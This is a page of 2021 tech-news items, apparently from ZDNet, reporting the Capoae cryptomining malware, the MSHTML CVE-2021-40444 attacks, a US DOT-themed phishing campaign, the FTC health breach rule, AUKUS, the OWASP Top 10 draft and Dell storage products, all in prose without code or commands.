Information Technology

A new strain of malware, written in Go, has been spotted in cyberattacks launched against WordPress and Linux systems. 

On Thursday, Larry Cashdollar, senior security researcher at Akamai said the malware, dubbed Capoae, is written in the Golang programming language — fast becoming a firm favorite with threat actors due to its cross-platform capabilities — and spreads through known bugs and weak administrative credentials.  Vulnerabilities exploited by Capoae include CVE-2020-14882, a remote code execution (RCE) flaw in Oracle WebLogic Server, and CVE-2018-20062, another RCE in ThinkPHP. The malware was spotted after a sample targeted an Akamai honeypot. A PHP malware sample arrived through a backdoor linked to a WordPress plugin called Download-monitor, installed after the honeypot’s lax credentials had been obtained through a brute-force attack. This plugin was then used as a conduit to deploy the main Capoae payload to /tmp, a 3MB UPX packed binary, which was then decoded. XMRig is then installed in order to mine for the Monero (XMR) cryptocurrency. Alongside the cryptocurrency miner, several web shells are also installed, one of which is able to upload files stolen from the compromised system. In addition, a port scanner has been bundled with the miner to find open ports for further exploitation.  “After the Capoae malware is executed, it has a pretty clever means of persistence,” Cashdollar says. “The malware first chooses a legitimate-looking system path from a small list of locations on a disk where you’d likely find system binaries. It then generates a random six-character filename, and uses these two pieces to copy itself into the new location on the disk and deletes itself. Once this is done, it injects/updates a Crontab entry that will trigger the execution of this newly created binary.”

Capoae will attempt to brute-force attack WordPress installations to spread and may also utilize CVE-2019-1003029 and CVE-2019-1003030, both of which are RCE flaws impacting Jenkins, and infections have been traced to Linux servers.  Cashdollar said that the Capoae campaign highlights “just how intent these operators are on getting a foothold on as many machines as possible.” Major signs of infection include high system resource use, unexpected or unrecognizable system processes in operation, and strange log entries or artifacts, such as files and SSH keys. “The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here,” Cashdollar commented. “Don’t use weak or default credentials for servers or deployed applications. Ensure you’re keeping those deployed applications up to date with the latest security patches and check in on them from time to time.” In a second blog post, Akamai has also examined the evolution of Kinsing, malware that utilizes known vulnerabilities in unpatched systems to operate and spread a cryptocurrency mining botnet.  According to researcher Evyatar Saias, Kinsing was first spotted in February by Akamai and, at first, only targeted Linux. However, a recent upgrade has allowed the botnet to also strike Windows systems across the Americas, Asia, and Europe. Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Microsoft has detailed how it recently saw hackers exploiting a dangerous remote code execution vulnerability in the MSHTML aka Trident rendering engine of Internet Explorer through rigged Office documents and targeted developers.Microsoft security researchers discovered the flaw being actively exploited on Windows systems in August and this week’s Patch Tuesday update included a patch for the previously unknown bug, tracked as CVE-2021-40444.  

The attacks were not widespread and the vulnerability was used as part of an early stage attack that distributed custom Cobalt Strike Beacon loaders. Cobalt Strike is a penetration testing tool. SEE: Don’t want to get hacked? Then avoid these three ‘exceptionally dangerous’ cybersecurity mistakesRather than the work of state-sponsored hackers, Microsoft found the loaders communicated with infrastructure that it links to several cyber-criminal campaigns, including human-operated ransomware, according to Microsoft’s analysis of the attacks. The social-engineering lure used in some of the attacks suggesting an element of deliberate targeting, Microsoft said: “The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted.” At least one organization that was successfully compromised by this campaign was previously compromised by a wave of similarly themed malware, Microsoft said. In a later wave of activity, however, the lure changed from targeting application developers to a “small claims court” legal threat.

The attackers in this case were using the IE rendering-engine flaw to load a malicious ActiveX control via an Office document. Despite the attack gaining access to affected devices, the attackers still relied on stealing credentials and moving laterally to affect the entire organization. Microsoft recommends customers apply Tuesday’s patch to fully mitigate the vulnerability, but also recommends hardening the network, cleaning up key credentials, and taking steps to mitigate lateral movement. SEE: Half of businesses can’t spot these signs of insider cybersecurity threatsMicrosoft considers this attack to be the work of an emerging or “developing” threat actor and is tracking the use of the Cobalt Strike infrastructure as DEV-0365. It seems to be operated by a single operator. However, Microsoft believes that follow-on activity, for example, delivered the Conti ransomware. The software giant suggests it could be a command-and-control infrastructure that’s sold as a service to other cybercriminals. “Some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads — activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878,” Microsoft notes. The BazaLoader malware has been used by malicious call center operators who use social engineering to trick targets into calling operators who attempt to trick victims into voluntarily installing malware. The groups do not use malicious links in emails reaching out to targets, thereby bypassing common email-filtering rules. More

The Federal Trade Commission (FTC) has warned that health apps and devices that collect or use personal health information must comply with rules requiring them to notify consumers if their health data is leaked.”Digital apps are routinely caught playing fast and loose with user data, leaving users’ sensitive health information susceptible to hacks and breaches,” said FTC chair Lina Khan.

ZDNet Recommends

The best smartwatch: Apple and Samsung battle for your wrist

It’s been six years since the first Apple Watch was released, and it’s pretty clear to most that Apple’s wearable is the best smartwatch available. It requires an iPhone, though, so Android phone owners need a different companion… and there are plenty of good options available.

Read More

She pointed to a study warning of problems with health apps ranging from insecure transmission of user data including geolocation, to unauthorized dissemination of data to advertisers and other third parties in violation of the apps’ own privacy policies.”While users have been adopting health apps at a rapid rate, the commercial owners of these apps too often fail to invest in adequate privacy and data security, leaving users exposed,” Khan said. SEE: Over 60 million wearable, fitness tracking records exposed via unsecured databaseThe Commission said that health apps, which track everything from glucose levels to heart health to fertility and sleep, are collecting sensitive and personal data. Consequently, the data they collect must be secured, and unauthorized access prevented.The FTC’s Health Breach Notification Rule requires vendors of personal health records and related entities to notify consumers, the FTC, and, in some cases, the media when that data is disclosed or acquired without the consumers’ authorization.

“In practical terms, this means that entities covered by the rule who have experienced breaches cannot conceal this fact from those who have entrusted them with sensitive health information,” the FTC said.Under the rule a ‘breach’ is not just defined by a cyberattack; unauthorized access, including sharing of covered information without an individual’s permission, also triggers notification obligations. “As many Americans turn to apps and other technologies to track diseases, diagnoses, treatment, medications, fitness, fertility, sleep, mental health, diet, and other vital areas, this Rule is more important than ever. Firms offering these services should take appropriate care to secure and protect consumer data,” the FTC said. Although the Health Breach Notification Rule has been in place for over a decade, it has never been used. And the FTC worries that, with the rise of health apps and other connected devices, there are still too few privacy protections in place. The Commission said it “intends to bring actions to enforce the rule” with violations leading to civil penalties of $43,792 per violation per day.SEE: Don’t want to get hacked? Then avoid these three ‘exceptionally dangerous’ cybersecurity mistakesThe breach notification rule provides some accountability for tech firms that abuse our personal information, but a more fundamental problem is the commodification of sensitive health information, with companies using this data to feed behavioral ads or power user analytics, said Khan. “Given the growing prevalence of surveillance-based advertising, the Commission should be scrutinizing what data is being collected in the first place and whether particular types of business models create incentives that necessarily place users at risk,” she said.The FTC said a health app would be covered under the rule if it collects health information from a consumer and has the technical capacity to draw information through an API that enables syncing with a consumer’s fitness tracker. More

Image: Getty Images
Australia, the UK, and the US are setting up a trilateral partnership aimed at addressing defence and security concerns in the Indo-Pacific region. The security partnership, called AUKUS, will look to promote deeper information and technology sharing between the three governments, with Australian Prime Minister Scott Morrison saying the new security partnership would enhance existing networks such as ANZU, the Quad, and the Five Eyes alliance. “We will foster deeper integration of security and defense-related science, technology, industrial bases, and supply chains. And in particular, we will significantly deepen cooperation on a range of security and defense capabilities,” the governments said in a joint statement. While the three countries didn’t mention China by name, the initiative appears to be a response to China’s expansionist drive in the South China Sea and increasing belligerence towards Taiwan. “Our world is becoming more complex, especially here in our region, the Indo-Pacific,” Australian Prime Minister Scott Morrison said on Thursday morning, alongside the respective leaders of the UK and US. Speaking from Washington DC, US President Joe Biden said the three countries needed to address “the current strategic environment in the region and how it may evolve”. “The future of each of our nations and indeed the world, depends on a free and open Indo-Pacific enduring and flourishing in the decades ahead,” Biden added.

The first initiative AUKUS will embark on is helping Australia acquire nuclear-powered submarines. Morrison said the three countries would spend the next 18 months drawing up a joint plan to assemble the new Australian nuclear-powered submarine fleet. The submarine fleet will be built in Adelaide. UK Prime Minister Boris Johnson, meanwhile, touted the project would be “one of the most complex and technically demanding projects in the world, lasting decades and requiring the most advanced technology”. In announcing this initiative, the governments jointly said the submarines are not an attempt to acquire nuclear weapons or establish a civil nuclear capability, and that the countries would continue to meet their nuclear non-proliferation obligations. Along with the submarines, AUKUS will also look to create initiatives that increase cyber capabilities, artificial intelligence, quantum technologies, and additional undersea capabilities, the governments said.The new trilateral partnership follows the three governments, along with the North Atlantic Treaty Organization (NATO) and other nations accusing China of being the actor responsible for Exchange hack back in April.Meanwhile, Australia last year did almost everything but name China as the actor responsible for cyber attacks that targeted all levels of government in Australia, as well as the private sector.”Australia doesn’t judge lightly in public attributions, and when and if we choose to do so, it is always done in the context of what we believe to be in our strategic national interest,” Morrison said at the time.  Related Coverage More

Nonprofit foundation Open Web Application Security Project (OWASP) has released an updated draft of its ranking of the top 10 vulnerabilities, the first changes to the list since November 2017.The new list features considerable changes, including the emergence of Broken Access Control, which moved from fifth on the list to number 1. The organization said 94% of applications have been tested for some form of broken access control and “the 34 CWEs mapped to Broken Access Control had more occurrences in applications than any other category.” Cryptographic Failures also moved up the list to number 2 due to its connection to sensitive data exposure and system compromise. Injection moved down to the third spot but OWASP noted that 94% of the applications were tested for some form of injection, which now includes cross-site scripting. A new category — Insecure Design — made its way into the fourth spot on the list followed by Security Misconfiguration, which moved up one spot compared to the 2017 list. Security Misconfiguration now includes external entities and the lists’ authors said it was not surprising considering 90% of applications were tested for some form of misconfiguration and that there has been more shifts to highly configurable software. Vulnerable and Outdated Components was ranked number 9 in 2017 but moved up to number 6 for this year’s ranking.”It is the only category not to have any CVEs mapped to the included CWEs, so a default exploit and impact weights of 5.0 are factored into their scores,” the lists’ authors noted. 
OWASP

Identification and Authentication Failures — previously called Broken Authentication — fell significantly from number 2 to 7, with OWASP explaining that the increased availability of standardized frameworks has helped in addressing it. Software and Data Integrity Failures is an entirely new category for 2021 and focuses primarily on assumptions related to software updates, critical data, and CI/CD pipelines without verifying integrity. “One of the highest weighted impacts from CVE/CVSS data mapped to the 10 CWEs in this category. Insecure Deserialization from 2017 is now a part of this larger category,” OWASP said.Security Logging and Monitoring Failures was previously last on the list but moved up one spot and has expanded to include other types of failures. While these are challenging to test for, they can “directly impact visibility, incident alerting, and forensics.”Last on the list is Server-Side Request Forgery, which has a “relatively low” incidence rate but was cited highly by industry professionals. OWASP said that overall, there were three new categories and four others that had either name or scope changes made for the 2021 list. OWASP, which has put the list together for more than a decade, compiles the list based on contributed data and industry surveys. “We do this for a fundamental reason, looking at the contributed data is looking into the past. AppSec researchers take time to find new vulnerabilities and new ways to test for them. It takes time to integrate these tests into tools and processes,” OWASP said. “By the time we can reliably test a weakness at scale, years have likely passed. To balance that view, we use an industry survey to ask people on the front lines what they see as essential weaknesses that the data may not show yet.”Jayant Shukla, CTO of K2 Cyber Security, told ZDNet that instead of old risks going away, OWASP has consolidated existing risks into several categories and new risks have been added, reflecting the increased threats facing web applications. Shukla noted that one of the reasons Server-Side Request Forgery attacks authentication issues are becoming more severe is because of the rapid increase in the use of microservices in building applications.”These new risk categories emphasize the need to shift left and improve pre-production testing. Unfortunately, these problems are often hard to find during testing, and sometimes they arise and are only a problem when different application modules interact, making them even harder to detect,” Shukla said. “In fact, the National Institute of Standards and Technologies has recognized these shortcomings, and last year updated their SP800-53 application security framework to include Runtime Application Self Protection and Interactive Application Security Testing to better protect against these critical software weaknesses. It’s time the software development industry got on board and adopted these more effective technologies.” More

Dell unveiled a slate of new features that come with its NAS solution EMC PowerScale on Wednesday, announcing that the tools “provide more flexible consumption, management, protection and security capabilities to eliminate data silos and help you effectively use unstructured data.” In a statement, the company said the PowerScale hybrid (H700 and H7000) is able to provide 75% more performance than comparable nodes. In contrast, archive nodes (A300 and A3000) are two times more effective than similar products.  “New PowerScale OneFS and DataIQ software enhancements expand storage management, performance monitoring, auditing and compliance capabilities to simplify file storage at scale. Enhancements to our API-integrated ransomware protection capabilities keep data protected from cyberattacks and now offer cloud deployment options in addition to on-premises,” Dell explained in a release. “Dynamic NAS Protection, available with PowerProtect Data Manager, delivers a simple, modern way to protect NAS systems through enhanced backup for file data enabling up to 3X faster backups and up to 2x faster restores.”The H700, H7000, A300 and A3000 represent what Dell called a “refresh” of the Isilon line of products that were unveiled last year. Dell said the new nodes offer more cores, memory and cache, additional networking options and more compatibility options. Nassos Galiopoulos, CTO at the University of Texas, San Antonio, said the Dell EMC PowerScale provides multiple nodes for transferring unstructured data at high speeds across the school’s HPC environment and scaling quickly to support their exponential data growth. “We now handle billions of records, along with big data analytics, AI, and machine learning, with tremendous velocity, variety, and volume,” Galiopoulos said. 

Later this quarter, Dell will also be releasing updates to OneFS that will allow the OS to “deliver writable snapshots, faster upgrades, secure boot, HDFS ACL support, and improved data reduction and small file efficiency.”DataIQ was enhanced recently to make it easier for users handling large scale clusters, and the updates allowed for UI enhancements as well as the ability to run reports to analyze volumes by time stamps.Dell unveiled new security features designed to help organizations deal with ransomware attacks. The “Cyber Protection and Recovery solution from Superna for PowerScale” was built to assist enterprises in responding and recovering from ransomware attacks. It now includes the Superna Ransomware Defender tool as well.”With this solution, customers can recover their data from a cybersecurity event leveraging the public cloud. A new Superna AirGap Enterprise provides more advanced automation to the air gap feature,” Dell explained. “Additional new productivity features to Superna’s Search and Recover and Easy Monitor capabilities also further expand PowerScale’s exceptional management and control capabilities. For organizations looking to manage easily, incremental-forever NAS data protection with rapid recovery at the file level, today we announced Dynamic NAS Protection, a simple, modern way to protect your NAS systems.” USC Australia infrastructure analyst Drew Hills noted that his organization has multiple policies using a variety of backup methods to protect files on their NAS and Windows File Clusters. “With PowerProtect Data Manager, Dynamic NAS Protection automatically slices shares, filesystems and volumes into multiple streams that run in parallel within the same policy,” Hill added. “It also automatically balances and scales across resources, simplifying management while accelerating backups faster than ever before.” More

A new report from Outseer has found that cybercriminals are increasingly turning to brand abuse to leverage attacks. The Outseer FraudAction team compiled the report based on the 49,000 attacks they tracked throughout Q2 of 2021. Armen Najarian, Outseer’s chief identity officer, told ZDNet that nearly half of the 49,000 cases Outseer detected in Q2 involved cybercriminals spoofing digital content and experiences, like a fake social media profile, a rogue mobile app or a spoofed website.”Bad actors impersonate credible brands this way to harvest consumer log-in credentials or personal data. As brands continue to accelerate their own digital transformation and as consumer data becomes more valuable, we predict brand abuse attacks will continue to increase,” Najarian said. Outseer said that for the third quarter in a row, brand abuse attacks were the most common attack vector detected. Outseer also found that the US continues to be the top hosting country for phishing attacks, holding on to the title since 2017. The US accounts for more than 72% of ISPs hosting these types of attacks, according to the report. Outseer attributed the trend to the handful of large-scale “hosting authorities,” whose sheer size makes it easier for fraudulent activity to go undetected.

But people and companies in the US are also the second largest target for phishing attacks after South Africa, which made it to the top of the list due to the 24 million people impacted by the Experian data breach.Najarian noted that app stores are rife with rogue apps designed to steal from unwitting consumers and said there has been a rise in the number of apps appearing in legitimate marketplaces and stores.”These fake apps, many of which pose as banking apps, infect users’ systems with malware if downloaded. We’ve seen 66% more of these rogue apps compared to last quarter, and 140% more compared to this same time last year,” Najarian said. In Q2 2021, Outseer researchers said they detected 140% more rogue banking apps compared to the same time frame last year, an increase of 66%. For the third quarter in a row, mobile banking is the dominant channel for attacks: 70% of fraudulent transactions in digital banking originated in mobile channels in Q2. The company also managed to recover more than 4.5 million unique compromised cards and card previews from online card stores and fraud communication channels in the quarter. “The pandemic will continue to drive even more digital commerce or various flavors conducted from both desktop environments and increasingly from mobile devices. The increase in digital transactions equates to an increase in vulnerability, and fraud actors will continue to seek access to our personal information if fraud prevention solutions, 3-D Secure and risk-based authentication tools, are not implemented,” Najarian said. “It’s more urgent now than ever for businesses to protect their brands, and to protect their customers from these dangerous attacks, particularly as we approach the holiday shopping season.” More

A new phishing campaign has been uncovered targeting companies that may work with the US Department of Transportation. The campaign, discovered by security company INKY, found that phishers are impersonating the US Department of Transportation (DOT) in an effort to harvest Microsoft Office 365 credentials, INKY’s Roger Kay wrote in a blog post. 

ZDNet Recommends

Kay noted that the phishing emails peaked around August 16-18, right after the US Senate passed the $1 trillion infrastructure bill on August 10.Dozens of phishing emails sought to impersonate the DOT, with attackers contacting multiple companies in the engineering, energy architecture industries asking them to submit bids for federal contracts.  “The basic pitch was, with a trillion dollars of government money flowing through the system, you, dear target, are being invited to bid for some of this bounty,” Kay said.”By creating a new domain, exploiting current events, impersonating a known brand, and launching a credential harvesting operation, the phishers came up with an attack just different enough from known strikes to evade standard detection methods.”Kay explained that attackers sent their phishing emails from “transportationgov[.]net,” a newly created domain intended to impersonate the usual government emails that come from .gov addresses. 

Amazon was the new domain’s registrar, Kay added, and the site was registered on August 16. “In the initial pitch, recipients were told that USDOT was inviting them to submit a bid for a department project by clicking a big blue button that said, ‘CLICK HERE TO BID.’ Recipients who clicked on the button were led to a site — transportation.gov.bidprocure.secure.akjackpot[.]com — with reassuring-sounding subdomains like ‘transportation,’ ‘gov,’ and ‘secure.’ But the base domain — akjackpot[.]com — was registered in 2019 and hosts what may or may not be an online casino that appears to cater to Malaysians. Either the site was hijacked, or the site owners are themselves the phishers who used it to impersonate the USDOT,” Kay wrote. “Once on akjackpot[.]com, the victim was instructed to ‘Click on the BID button and sign in with your email provider to connect to the network.’ Targets were told to contact ‘mike.reynolds@transportationgov[.]us’ if there were any questions. However, transportationgov[.]us was another newly created domain registered by the phishers.”The phishers made their website look legitimate by copying the HTML and CSS from the real USDOT website. They even included a real warning on the government site about making sure users check that sites are legitimate US government websites. From there, victims were urged to click a red button asking them to bid, bringing up a Microsoft logo above a form meant to harvest Office 365 credentials. If a victim made it that far and actually entered their credentials, they were given a CAPTCHA challenge which then took them to a fake error message. From there, they were redirected to the real USDOT website, according to Kay.”This last move, dumping victims on a real site is an elegant but perhaps unnecessary flourish that phishers often execute as the final step of their sequence. In the con business, this moment is called the ‘blow-off’ and refers to the time after which the perpetrator has obtained what they were after, but before the mark realizes that they’ve been duped,” Kay said. “In the physical world of swindling, the blow-off gives the perpetrator time to getaway. This remnant of older con games sometimes turns up as an artefact in the digital world, where the perpetrators were never ‘there’ in the first place.” More